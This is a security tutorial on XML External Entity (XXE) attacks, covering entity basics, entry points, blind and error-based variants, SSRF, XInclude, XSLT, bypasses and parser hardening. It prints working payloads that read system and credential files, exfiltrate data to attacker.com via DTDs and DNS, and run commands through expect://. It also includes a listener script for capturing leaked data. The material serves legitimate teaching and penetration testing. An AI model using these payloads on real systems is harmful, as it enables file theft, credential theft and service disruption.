XML External Entity (XXE)
1. What Is XXE
XXE is a vulnerability where an XML parser resolves external entities, letting an attacker read files, make server-side requests, and (sometimes) execute code.
Attacker → XML with malicious DTD → Parser → Resolves entity
↓
file:///etc/passwd
http://169.254.169.254/...
http://internal-service/...
The key point: the parser itself fetches data from the URI in SYSTEM — the attacker just tells it where to go.
This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default. External entity support was a feature, not a bug. The problem is that "any URI" includes file://, http://, ftp://, and sometimes expect://.
2. Fundamentals: XML, DTD, Entities
XML Entity
An entity is a variable in XML. It's declared in the DTD and used in the document or within the DTD itself.
Two Ways to Classify Entities
By value source:
| Type | Value | Example |
|---|---|---|
| Internal | Defined directly in DTD | <!ENTITY name "John"> |
| External | Loaded from a file/URL | <!ENTITY name SYSTEM "file:///etc/passwd"> |
By usage location:
| Type | Syntax | Where it works | Used for |
|---|---|---|---|
| General entity | &name; | In the XML document body | Classic XXE |
| Parameter entity | %name; | Only inside the DTD | Blind XXE (OOB) |
<!-- General entity — in the document body -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<foo>&xxe;</foo>
<!-- Parameter entity — inside the DTD -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%eval;
Why parameter entities matter: in blind XXE you need to build the payload inside the DTD — read a file and embed its contents into a URL. General entities can't do that — they only work in the body. Parameter entities let you substitute values directly within the DTD, building dynamic constructs.
Parameter Entity Restriction in the Internal DTD Subset
Per the XML spec (well-formedness constraint "PEs in Internal Subset"), parameter-entity references in the internal DTD subset may appear only between markup declarations, never inside one. This means a construct like <!ENTITY % a "..."> <!ENTITY % b "<!ENTITY % c SYSTEM '...'> %a;"> %b; inside <!DOCTYPE foo [ ... ]> won't work: the %a; reference sits inside the declaration of b, so the parser rejects it.
This is why blind XXE usually relies on an external DTD: the restriction doesn't apply there, so parameter entities can be referenced inside other declarations. It explains why blind XXE payloads typically load evil.dtd from the attacker's server: only inside a loaded DTD file does the parser allow free combination of parameter entities, enabling substitution chains.
Exception — the trick with redefining an entity from a local system DTD (described in section 4, Error-based via entity redefinition). In this case you load a legitimate DTD file from the server itself and redefine one of its entities with your payload.
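The restriction can be observed directly. The sketch below is a minimal illustration using Python's standard-library ElementTree (backed by expat); the choice of parser and the document strings are assumptions made for the demo, not something the article prescribes. It only checks that a parameter-entity reference placed inside a declaration in the internal subset is rejected.

```python
import xml.etree.ElementTree as ET

# %a; is referenced INSIDE the declaration of b, within the internal subset.
INTERNAL_SUBSET_CHAIN = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % a "value">
  <!ENTITY b "prefix-%a;">
]>
<foo>&b;</foo>"""

# Control: the parameter entity is declared but never referenced.
CONTROL = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % a "value">
  <!ENTITY b "prefix">
]>
<foo>&b;</foo>"""


def is_rejected(document: str) -> bool:
    """Return True if the parser refuses the document as not well-formed."""
    try:
        ET.fromstring(document)
    except ET.ParseError:
        return True
    return False


chain_rejected = is_rejected(INTERNAL_SUBSET_CHAIN)
control_rejected = is_rejected(CONTROL)
```

Other parsers report the same condition with different error texts, so the check looks only at whether parsing fails.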
DTD (Document Type Definition)
DTD is a set of rules describing XML structure. Entities are declared in the DTD.
No DTD = no entity declarations = no XXE.
Where the DTD can live:
<!-- 1. Internal DTD — inside the document itself (between [ and ]) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
<!-- 2. External DTD — loaded from a URL -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">
<foo>&xxe;</foo>
<!-- 3. Combined — internal + external -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd" [
<!ENTITY % local "value">
]>
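To make the internal/external distinction concrete, here is a minimal sketch using Python's standard-library xml.etree.ElementTree (the language and parser are assumptions for illustration). It shows an internal entity being substituted, and this particular parser refusing an external entity instead of fetching it. A vulnerable parser would return the file contents at that point.

```python
import xml.etree.ElementTree as ET

INTERNAL = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY name "John">
]>
<foo>&name;</foo>"""

EXTERNAL = """<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""


def try_expand(document: str) -> str:
    """Return the root element's text, or a marker if parsing is refused."""
    try:
        return ET.fromstring(document).text or ""
    except ET.ParseError as exc:
        return f"rejected: {exc}"


internal_result = try_expand(INTERNAL)  # internal entity is substituted
external_result = try_expand(EXTERNAL)  # ElementTree does not load external entities
```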
3. Where to Look for XXE
Obvious Entry Points
- API endpoints with Content-Type: application/xml or text/xml
- SOAP services (the entire protocol is XML-based)
- XML file uploads (configs, feeds, data)
- RSS/Atom import
Less Obvious Entry Points
- SVG uploads — SVG is XML
- DOCX/XLSX/PPTX uploads — ZIP archives with XML inside
- GPX uploads — geodata in XML
- XHTML — HTML in XML format
- SAML — XML-based authentication
- PDF generation from XML/XSLT
- Configuration files: .xml, .plist, .svg
Content-Type Swap (JSON → XML)
If the application accepts JSON, try switching the format:
# Before:
POST /api/user HTTP/1.1
Content-Type: application/json
{"name": "test", "email": "test@test.com"}
# After:
POST /api/user HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<email>test@test.com</email>
</user>
Why this works: frameworks (Spring, ASP.NET, Rails) often pick the parser automatically based on Content-Type. If the XML parser is enabled and not hardened — XXE.
Also check: text/xml, application/xhtml+xml, image/svg+xml.
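The swap can be scripted. The following sketch converts a flat JSON body into the equivalent XML probe; the function name json_to_xxe_probe, the root element name, and the assumption that every JSON key is a valid XML element name are all hypothetical choices for illustration.

```python
import json
from xml.sax.saxutils import escape


def json_to_xxe_probe(json_body: str, root: str, target_field: str,
                      uri: str = "file:///etc/passwd") -> str:
    """Rebuild a flat JSON object as XML, placing &xxe; in one field."""
    fields = json.loads(json_body)
    lines = [
        '<?xml version="1.0"?>',
        "<!DOCTYPE foo [",
        f'<!ENTITY xxe SYSTEM "{uri}">',
        "]>",
        f"<{root}>",
    ]
    for key, value in fields.items():
        # Only the chosen field carries the entity reference; the rest is escaped.
        content = "&xxe;" if key == target_field else escape(str(value))
        lines.append(f"<{key}>{content}</{key}>")
    lines.append(f"</{root}>")
    return "\n".join(lines)


probe = json_to_xxe_probe('{"name": "test", "email": "test@test.com"}',
                          root="user", target_field="name")
```

Send the result with Content-Type: application/xml and compare the response with the JSON baseline.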
4. XXE Types
4.1 Classic (Non-blind) XXE
The parser response is displayed — file contents are visible in the response.
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
Server response:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
4.2 Blind XXE
The parser response is not displayed. Three approaches:
OOB (Out-of-Band) — Sending Data Out
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<foo>&send;</foo>
evil.dtd on the attacker's server:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%all;
The chain:
- Parser reads /etc/hostname → into %file
- Loads evil.dtd → into %dtd
- %all assembles a new entity send with data in the URL
- &send; triggers an HTTP request to attacker.com carrying the data
Tools for receiving: Burp Collaborator, interactsh, your own server with python3 -m http.server.
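If you run your own server, a small listener can both serve evil.dtd and record the callback. This is a sketch under assumptions: the names OOBHandler and start_listener are hypothetical, the DTD is generated from the request's Host header, and the leaked value is expected in the d query parameter as in the chain above.

```python
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs, urlparse

# External DTD from the chain above; {host} is filled in per request.
EVIL_DTD_TEMPLATE = (
    "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://{host}/?d=%file;'>\">\n"
    "%all;\n"
)


class OOBHandler(BaseHTTPRequestHandler):
    captured = []  # values received in the "d" parameter, shared by all requests

    def do_GET(self):
        url = urlparse(self.path)
        if url.path == "/evil.dtd":
            host = self.headers.get("Host", "attacker.com")
            body = EVIL_DTD_TEMPLATE.format(host=host).encode()
            content_type = "application/xml-dtd"
        else:
            # Any other request is treated as a callback carrying data.
            self.captured.extend(parse_qs(url.query).get("d", []))
            body = b""
            content_type = "text/plain"
        self.send_response(200)
        self.send_header("Content-Type", content_type)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):
        pass  # silence the default per-request logging


def start_listener(port: int = 0) -> ThreadingHTTPServer:
    """Start the listener in a background thread; port 0 picks a free port."""
    server = ThreadingHTTPServer(("127.0.0.1", port), OOBHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server
```

Call start_listener(), point the payload's SYSTEM URI at /evil.dtd on that address, and read OOBHandler.captured after the target parses the document. For a real test the bind address must be reachable from the target.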
Error-based — Data in the Error Message
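Useful when the out-of-band callback carrying the data is blocked or unreliable but the application returns parser error messages. This variant still needs one outbound request to load error.dtd; when even that is blocked, use the local-DTD variant described after it.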
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
%dtd;
]>
<foo>&trigger;</foo>
error.dtd:
<!ENTITY % all "<!ENTITY trigger SYSTEM 'file:///nonexistent/%file;'>">
%all;
The parser tries to open file:///nonexistent/web-server-01 → error:
java.io.FileNotFoundException: /nonexistent/web-server-01
→ File contents in the error text.
Error-based via Entity Redefinition (No Outbound Connections)
If you can't even load evil.dtd, but there's a local DTD on the server:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<foo>bar</foo>
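You redefine an entity from the local DTD, injecting your payload. Because the nested declarations sit in the internal subset, the characters %, & and ' inside them are written as character references (&#x25;, &#x26;, &#x27;). When outbound connections are fully blocked and the response is not reflected, this is usually the only practical route: no external DTD is needed and everything happens locally, but parser errors must be visible and a suitable DTD must exist on disk.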
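The escaping is easy to get wrong by hand, so a generator helps. The sketch below builds the redefinition payload for a given local DTD path and entity name; the function name local_dtd_payload is hypothetical, and which DTD files and entity names exist on a given target has to be discovered separately.

```python
def local_dtd_payload(dtd_path: str, entity_name: str, target: str) -> str:
    """Build an error-based payload that redefines entity_name from a local DTD.

    Inside the redefined entity, % becomes &#x25;, the & of the nested
    reference becomes &#x26;, and ' becomes &#x27;, so the single-quoted
    literal stays intact until the parser expands it.
    """
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
        f"<!ENTITY % {entity_name} '\n"
        f'<!ENTITY &#x25; file SYSTEM "file://{target}">\n'
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        '&#x27;file:///nonexistent/&#x25;file;&#x27;>">\n'
        "&#x25;eval;\n"
        "&#x25;error;\n"
        "'>\n"
        "%local_dtd;\n"
        "]>\n"
        "<foo>bar</foo>"
    )


payload = local_dtd_payload("/usr/share/yelp/dtd/docbookx.dtd", "ISOamso", "/etc/passwd")
```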
4.3 XXE → SSRF
XXE is a full-fledged vector for SSRF:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<foo>&xxe;</foo>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<foo>&xxe;</foo>
All SSRF techniques apply: cloud metadata, port scanning, accessing internal services.
4.4 XXE → DoS (Billion Laughs)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!-- ... -->
]>
<foo>&lol9;</foo>
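Each level multiplies the size by 10. In the listing above lol2 is the first tenfold level, so &lol9; expands to 10^8 copies of the string "lol" (about 300 MB of text); the classic payload with nine tenfold levels reaches 10^9 copies, roughly 3 GB. Exponential expansion = the parser eats all available memory.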
Doesn't leak data, but useful for:
- Confirming DTD processing — if Billion Laughs works, the parser processes entities, so you can try XXE
- DoS attacks — taking the service down
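The expansion arithmetic behind Billion Laughs is simple enough to compute. In this sketch, levels counts the tenfold expansion steps above the base entity; the function name expansion_size is an illustrative choice, and the result is the size of the expanded text only, not the parser's actual memory use.

```python
def expansion_size(base: str = "lol", fanout: int = 10, levels: int = 9) -> int:
    """Bytes of text produced by fully expanding the top-level entity."""
    return len(base.encode("utf-8")) * fanout ** levels


sizes = {levels: expansion_size(levels=levels) for levels in (1, 3, 8, 9)}
for levels, size in sizes.items():
    print(f"{levels} levels -> {size:,} bytes")
```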
5. XInclude
When It Applies
You don't control the entire XML document — only a piece of data that gets inserted into XML on the server. You can't declare a DOCTYPE (it must be at the beginning of the document).
Example: your input (username, comment) gets embedded into an XML template on the backend.
Payload
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</foo>
- xmlns:xi: namespace declaration for XInclude
- parse="text": read as text (without this the parser expects valid XML)
- No DOCTYPE needed
- Only works if the parser supports XInclude and has it enabled (libxml2, Xerces and most Java parsers support it, but it is usually off by default)
Hands-on exercise: XInclude Attack (PortSwigger).
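XInclude processing is an explicit step in many stacks, which is easy to see in Python's standard library. The sketch below is an illustration only: it writes a temporary stand-in file, parses a payload of the shape shown above, and includes the file only when ElementInclude.include is called. The default loader opens href as a plain path, so the demo uses a path rather than a file:// URI.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude


def render_with_xinclude(document: str) -> str:
    """Parse, run XInclude processing, and serialize the result."""
    root = ET.fromstring(document)
    ElementInclude.include(root)  # explicit opt-in: this is where href is read
    return ET.tostring(root, encoding="unicode")


# Stand-in for a sensitive file (hypothetical content).
with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as handle:
    handle.write("secret-from-disk")
    secret_path = handle.name

payload = (
    '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
    f'<xi:include parse="text" href="{secret_path}"/>'
    "</foo>"
)

text_without_include = ET.fromstring(payload).text  # plain parsing leaves xi:include alone
rendered = render_with_xinclude(payload)            # file contents now inline
os.unlink(secret_path)
```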
6. XXE via File Formats
SVG
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
<text x="0" y="20">&xxe;</text>
</svg>
Upload as an avatar/image → if the server parses SVG (e.g., converts to PNG) → XXE.
DOCX / XLSX
- Create a normal .docx file
- Unzip it (it's a ZIP): unzip document.docx -d doc_extracted
- Edit doc_extracted/word/document.xml: insert DTD with payload
- Re-zip: cd doc_extracted && zip -r ../evil.docx .
- Upload to the server
Files inside DOCX where you can insert the payload:
- word/document.xml
- [Content_Types].xml
- _rels/.rels
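The unzip, edit, re-zip steps can be done in memory. This is a rough sketch under assumptions: the function name inject_doctype is hypothetical, the target member is assumed to be UTF-8 without a byte-order mark, and the DOCTYPE is inserted right after the XML declaration.

```python
import io
import zipfile


def inject_doctype(docx_bytes: bytes, doctype: str,
                   member: str = "word/document.xml") -> bytes:
    """Return a copy of the archive with doctype inserted into one member."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                text = data.decode("utf-8")
                # Insert after the XML declaration if there is one, else at the top.
                end = text.find("?>") + 2 if text.startswith("<?xml") else 0
                text = text[:end] + "\n" + doctype + "\n" + text[end:]
                data = text.encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()
```

For a blind test, a DOCTYPE that only loads an external parameter entity is enough; for a reflected one, an entity reference also has to be placed in the document text.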
7. The Bad Character Problem and Bypasses
The Problem
When the parser substitutes file contents, it tries to parse them as XML. If the file contains <, &, ]]> — the parser breaks.
file:///etc/passwd ✅ — no special characters
file:///var/www/config.php ❌ — full of < and &
file:///etc/fstab ❌ — may contain &
Bypass 1: PHP Filter (If the Server Runs PHP)
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">
The file arrives in base64 — no special characters. Decode on your end.
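Decoding on your end is a one-liner, but responses often come back line-wrapped or with padding trimmed. A small helper, sketched here with a hypothetical name decode_leak and a made-up sample value, handles both cases.

```python
import base64


def decode_leak(encoded: str) -> str:
    """Decode php://filter output, tolerating whitespace and missing padding."""
    compact = "".join(encoded.split())
    compact += "=" * (-len(compact) % 4)  # restore stripped '=' padding
    return base64.b64decode(compact).decode("utf-8", errors="replace")


# Made-up sample: a PHP snippet containing characters that would break XML.
original = "<?php $db_pass = 'a&b'; ?>"
sample = base64.b64encode(original.encode()).decode()
decoded = decode_leak(sample)
```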
Bypass 2: CDATA Wrapper via Parameter Entities
evil.dtd:
<!ENTITY % file SYSTEM "file:///var/www/html/config.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY wrapped '%start;%file;%end;'>">
%all;
Main XML:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<foo>&wrapped;</foo>
File contents get wrapped in CDATA → the parser doesn't interpret special characters.
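Why the wrapper helps can be checked with any XML parser. The sketch below uses Python's ElementTree with a made-up string standing in for file contents: the same text breaks parsing when inlined raw and survives intact inside CDATA.

```python
import xml.etree.ElementTree as ET

RAW = "if (a < b && c) { run(); }"  # stand-in for file contents with < and &


def parses(document: str) -> bool:
    """Return True if the document is well-formed for this parser."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


unwrapped = f"<foo>{RAW}</foo>"
wrapped = f"<foo><![CDATA[{RAW}]]></foo>"

unwrapped_ok = parses(unwrapped)            # raw < and & are not well-formed
wrapped_text = ET.fromstring(wrapped).text  # CDATA content comes back unchanged
```

The wrapper still fails if the file itself contains ]]>, since that sequence closes the CDATA section early.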
Bypass 3: jar:// Protocol (Java)
jar:http://attacker.com/evil.jar!/file.txt
Java-specific: the parser downloads the archive to a temporary file and reads the named entry from it (the actual syntax is jar:<url>!/<entry>, without //). Can be used to bypass protocol restrictions.
8. Exploitation: What to Read
System Files
Linux:
file:///etc/passwd
file:///etc/shadow — password hashes (needs root)
file:///etc/hostname
file:///proc/self/environ — environment variables (secrets, keys)
file:///proc/self/cmdline — process arguments
file:///home/user/.ssh/id_rsa — private SSH key
file:///home/user/.bash_history — command history
Windows:
file:///C:/Windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa
file:///C:/inetpub/wwwroot/web.config
Application Configs
file:///var/www/html/config.php
file:///var/www/html/.env
file:///var/www/html/wp-config.php
file:///opt/app/application.properties — Spring Boot
file:///opt/app/application.yml
file:///etc/nginx/nginx.conf
file:///etc/apache2/sites-enabled/000-default.conf
Cloud Metadata (XXE → SSRF)
http://169.254.169.254/latest/meta-data/iam/security-credentials/ — AWS
http://metadata.google.internal/computeMetadata/v1/ — GCP
http://169.254.169.254/metadata/instance — Azure
Caveat: an entity fetch is a plain GET with no custom headers, so endpoints that require a header (Metadata-Flavor: Google on GCP, Metadata: true on Azure) or a session token (AWS IMDSv2) generally won't answer. The AWS path above works against IMDSv1.
More on SSRF: SSRF (Server-Side Request Forgery).
9. XXE via XSLT
If the server performs XSLT transformations, the document() function in XSLT can be used to read files and make HTTP requests — similar to XXE, but through a different mechanism. This is a separate attack surface, unrelated to DTD and entities.
File Read via XSLT
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<xsl:copy-of select="document('file:///etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
SSRF via XSLT
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/">
<xsl:copy-of select="document('http://169.254.169.254/latest/meta-data/')"/>
</xsl:template>
</xsl:stylesheet>
Why This Works
XSLT processors (Xalan, Saxon, libxslt) allow document() by default. The function is meant for loading additional XML documents during transformation, but it supports arbitrary URIs — including file:// and http://.
Important: even if the application has fully disabled DTD and external entities in the XML parser, XSLT transformation can still be vulnerable. These are two different mechanisms, and defending against one doesn't protect against the other.
10. Chaining with Other Vulnerabilities
XXE rarely exists in a vacuum — exploitation often builds on chains with other vulnerabilities:
| Chain | How it works | Impact |
|---|---|---|
| XXE → SSRF | External entity with http:// URI | Cloud metadata, internal services |
| XXE → LFI | Reading source code → finding new vulnerabilities | Secret disclosure, further escalation |
| Blind XXE + DNS | DNS exfiltration works even through strict HTTP firewalls | Confirming the vulnerability, slow exfiltration |
| XXE → RCE | expect:// (PHP), jar:// chains, XSLT code execution | Full server control |
| SSRF → XXE | SSRF to an internal service that parses XML | Reading local files on the internal server |
XXE → RCE (PHP + expect)
The expect:// URI scheme in PHP executes shell commands:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>
If the server returns uid=33(www-data)... — that's RCE. Requirements: PHP + the expect extension loaded. Rare in production, common in CTFs.
DNS Exfiltration
When outbound HTTP is fully blocked, DNS queries often get through:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://%file;.attacker.com/'>">
%eval;
Data arrives as a subdomain in the DNS query — track it via Burp Collaborator or interactsh.
11. Testing Methodology
Step 1: Discover Entry Points
- Find all endpoints that accept XML (Content-Type, SOAP, files)
- Check file uploads: SVG, DOCX, XLSX, XML
- Try swapping Content-Type from JSON to XML
- Check SAML endpoints
Step 2: Test DTD Processing
Send a harmless payload — if the parser processes DTD, XXE is possible:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "testvalue">
]>
<foo>&xxe;</foo>
If the response contains testvalue → DTD is processed → try an external entity.
Step 3: Determine the Type
| Situation | Type | Approach |
|---|---|---|
| Parser response is visible | Classic | SYSTEM "file:///etc/passwd" |
| Response not visible, outbound allowed | Blind OOB | Parameter entities + external DTD |
| Response not visible, outbound blocked | Blind Error-based | Error with data or local DTD |
| You don't control DOCTYPE | XInclude | xi:include |
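The decision table can be read as a small function. This sketch simply encodes the four rows; the function name and the three boolean observations are illustrative.

```python
def choose_approach(controls_doctype: bool, response_visible: bool,
                    outbound_allowed: bool) -> str:
    """Map what you observed about the target to the technique to try first."""
    if not controls_doctype:
        return "XInclude"
    if response_visible:
        return "Classic"
    if outbound_allowed:
        return "Blind OOB"
    return "Blind Error-based"


first_try = choose_approach(controls_doctype=True, response_visible=False,
                            outbound_allowed=True)
```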
Step 4: Exploitation
1. file:///etc/passwd → confirm file read
2. file:///proc/self/environ → secrets from env
3. file:///home/user/.ssh/id_rsa → SSH keys
4. http://169.254.169.254/... → cloud credentials
5. http://internal:PORT/... → SSRF to internal services
6. php://filter/... → read PHP code (base64)
Step 5: If It Doesn't Work
- Try other protocols: file://, http://, php://, jar://
- Try parameter entities instead of general
- Try XInclude
- Try the error-based approach
- Try via files (SVG, DOCX)
- Check other Content-Type values
- Try UTF-16 encoding (some filters only check for DOCTYPE in ASCII)
- Split the payload across multiple entity definitions
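The UTF-16 item is worth a short demonstration. The sketch below re-encodes the harmless probe from Step 2 and checks two things: a byte-level search for the ASCII string <!DOCTYPE no longer matches, and a standard parser (Python's ElementTree here, as an assumption) still reads the document.

```python
import xml.etree.ElementTree as ET

PROBE = (
    '<?xml version="1.0" encoding="UTF-16"?>\n'
    '<!DOCTYPE foo [<!ENTITY xxe "testvalue">]>\n'
    "<foo>&xxe;</foo>"
)

encoded = PROBE.encode("utf-16")              # BOM plus two bytes per character
hidden = b"<!DOCTYPE" not in encoded          # an ASCII byte match no longer fires
parsed_text = ET.fromstring(encoded).text     # the parser decodes it transparently
```

Send the encoded bytes as the request body; some servers also expect charset=utf-16 in the Content-Type header.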
12. XXE Defense
The Right Approach — Disable DTD / External Entities
Java (DocumentBuilderFactory) — most reliable:
// Disallow DOCTYPE entirely
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Java (SAXParserFactory):
SAXParserFactory factory = SAXParserFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
Python (lxml):
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
PHP:
libxml_disable_entity_loader(true); // PHP < 8.0
// In PHP 8.0+ external entities are disabled by default
C# (.NET):
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
Ruby (Nokogiri):
Nokogiri::XML(xml) { |config| config.nonet }
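For Python code limited to the standard library, the same "no DOCTYPE at all" policy can be approximated with an expat pre-check. This is a sketch, not a replacement for a maintained library such as defusedxml: the names DoctypeForbidden and parse_without_doctype are hypothetical, and the document is parsed twice for simplicity.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def _forbid_doctype(name, system_id, public_id, has_internal_subset):
    # expat calls this handler as soon as it sees <!DOCTYPE ...>.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_without_doctype(data: bytes) -> ET.Element:
    """Reject any DOCTYPE first, then parse with ElementTree."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _forbid_doctype
    checker.Parse(data, True)  # raises DoctypeForbidden or expat.ExpatError
    return ET.fromstring(data)
```

Rejecting the DOCTYPE also stops Billion Laughs, since no entity can be declared without it.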
The LIBXML_NOENT Trap in PHP
// VULNERABLE — ENABLES entity substitution:
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
// SAFE — without the flag:
$doc = simplexml_load_string($xml);
LIBXML_NOENT = "substitute entity values into text" → the parser resolves external entities → XXE.
The name is misleading: "NO ENT" looks like "no entities", but it actually means "no entities in the output" (replace them with their values).
Parser Defaults by Language and Version
| Language / Library | Safe by default? | Since version | Note |
|---|---|---|---|
| Java DocumentBuilderFactory | No | — | Requires explicit configuration even in Java 17+ |
| Java SAXParserFactory | No | — | Same |
| PHP simplexml_load_string | Yes | PHP 8.0+ | PHP <8 needs libxml_disable_entity_loader(true) |
| PHP + LIBXML_NOENT | NO! | — | The flag enables entity substitution (trap) |
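| Python lxml | Partially | 5.0+ | no_network=True by default; since 5.0 resolve_entities defaults to 'internal' (external entities are not resolved); older versions need resolve_entities=False |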
| Python defusedxml | Yes | always | Purpose-built for safe parsing |
| Python xml.etree.ElementTree | Partially | — | Doesn't support external entities, but vulnerable to Billion Laughs |
| .NET XmlReader | Yes | .NET Core | In .NET Framework depends on version |
| Ruby Nokogiri | Yes | 1.13+ | NONET by default |
| libxml2 | Yes | 2.9+ | But LIBXML_NOENT breaks the protection |
General Principles
- Disable DTD entirely — don't try to filter individual entities
- Don't trust defaults — in many languages external entities are enabled by default
- Validate Content-Type — don't accept XML if you're not expecting it
- Parse files safely — SVG, DOCX, XLSX should be parsed with entities disabled
- Don't filter input data: filters get bypassed (UTF-16, parameter entities)
- Don't use XML where JSON would work
- Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML
- Track specific versions of libraries and their defaults — don't rely on "probably safe"
13. Severity Assessment
| Severity | Conditions |
|---|---|
| Critical | Reading arbitrary files with secrets, cloud credentials via SSRF, RCE via chain |
| High | Reading system files (/etc/passwd, configs), SSRF to internal network |
| Medium | Blind XXE with limited exfiltration, SSRF only to specific hosts |
| Low | DoS only (Billion Laughs), DTD is processed but external entities are blocked |
14. Tools
| Tool | Purpose |
|---|---|
| Burp Suite | Intercepting requests, swapping Content-Type, testing payloads |
| Burp Collaborator / interactsh | Confirming blind XXE (OOB callback) |
| XXEinjector | Automating XXE exploitation (OOB, error-based) |
| oxml_xxe | Generating DOCX/XLSX/PPTX with XXE payloads |
| docem | Embedding XXE into DOCX/XLSX/ODT |
| python3 -m http.server | Quick server for receiving OOB and serving evil.dtd |
15. Notable Cases
Facebook (2014, Bug Bounty): Blind XXE via DOCX upload on the careers portal → reading /etc/passwd. Bounty $30,000+.
Uber (2016, Bug Bounty): XXE in the SAML parser → reading arbitrary files from the server.
Google (2014, Bug Bounty): XXE via XLSX upload in the Google Toolbar button gallery.
PortSwigger Research: XXE via SVG in avatar uploads — a common pattern in real-world applications.
16. Q&A — Prep Questions
1. What is XXE?
